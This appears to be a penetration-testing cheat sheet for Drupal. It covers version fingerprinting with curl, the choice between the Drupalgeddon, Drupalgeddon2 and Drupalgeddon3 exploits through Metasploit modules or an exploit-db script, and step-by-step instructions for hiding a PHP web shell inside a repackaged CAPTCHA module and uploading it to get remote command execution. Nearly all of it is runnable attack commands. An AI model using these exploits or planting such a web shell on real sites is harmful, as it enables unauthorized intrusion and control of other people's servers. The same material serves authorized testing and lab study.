Version#

curl -s "http://$target/CHANGELOG.txt"

curl -s "http://$target/" | grep -i drupal

• 7.0 up to 7.31, use Drupalgeddon
• Below 7.58 and 8.5.1, use Drupalgeddon2
• Various 7.x and 8.x, use Drupalgeddon3

RCE#

Drupalgeddon#

Version: 7.0 up to 7.31

Pre-authenticated

msfconsole

use exploit/multi/http/drupal_drupageddon
show options

Drupalgeddon2#

Version: below 7.58 and 8.5.1

Insufficient input sanitization during user creation

curl -s https://www.exploit-db.com/raw/44448 -o drupalgeddon2.py
# Change the exploit yourself
python3 ./drupalgeddon2.py

Drupalgeddon3#

Version: Various 7.x and 8.x

Need to be logged into a user that can delete a node

msfconsole

use exploit/multi/http/drupal_drupageddon3
show options

Install custom php#

Go to drupal.org and download a module, like CAPTCHA

wget https://ftp.drupal.org/files/projects/captcha-2.0.9.tar.gz
tar xvf captcha*.tar.gz
cd captcha*
echo '<?php system($_GET["cmd"]); ?>' > shell.php
vim .htaccess

Write this into .htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Compress the directory again

cd ..
tar cvf captcha.tar.gz captcha*

Browse to /admin/reports/updates/install, or /admin/modules/install and upload our .tar.gz module. Sometimes these path does not exist.

After doing all that, browse to http://$target/modules/captcha/shell.php?cmd=<command> to do RCE